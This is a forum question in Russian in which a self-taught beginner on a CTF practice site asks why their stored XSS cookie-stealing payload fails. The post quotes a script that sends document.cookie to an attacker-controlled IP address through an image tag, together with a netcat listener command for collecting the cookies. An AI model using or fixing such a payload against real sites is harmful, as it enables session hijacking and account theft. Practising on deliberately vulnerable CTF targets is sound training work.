Я новичок в области вычислительной техники, и в настоящее время я выполняю некоторые практические задачи CTF на одном из этих уязвимых веб-сайтов и обнаружил уязвимость XSS.Я знаю, что могу использовать сохраненный XSS для кражи пользовательских куки, но я не знаю, почему мой код не работает, например, почему, когда другой пользователь переходит на уязвимую страницу, его куки не записываются с моей стороны.
Я ввел эту XSS-инъекцию в текстовое поле <script> document.write('<img src="http://l92.168.48.6:6790?cookie ='+ escape(document.cookie) + '" />);</script> Но затем в терминале Linux я набираю nc -l -p 6790, и я не получаю никаких файлов cookie.Например, если я сделаю <script>alert(document.cookie)</script>, он покажет мой файл cookie, но я намерен украсть файл cookie для следующих пользователей, т.е. когда пользователь заходит на страницу.
Я уверен, что это что-то настолько тривиальное для вас, ребята, но, пожалуйста,Помогите парню нубу.Я новичок в кибербезопасности и самоучка.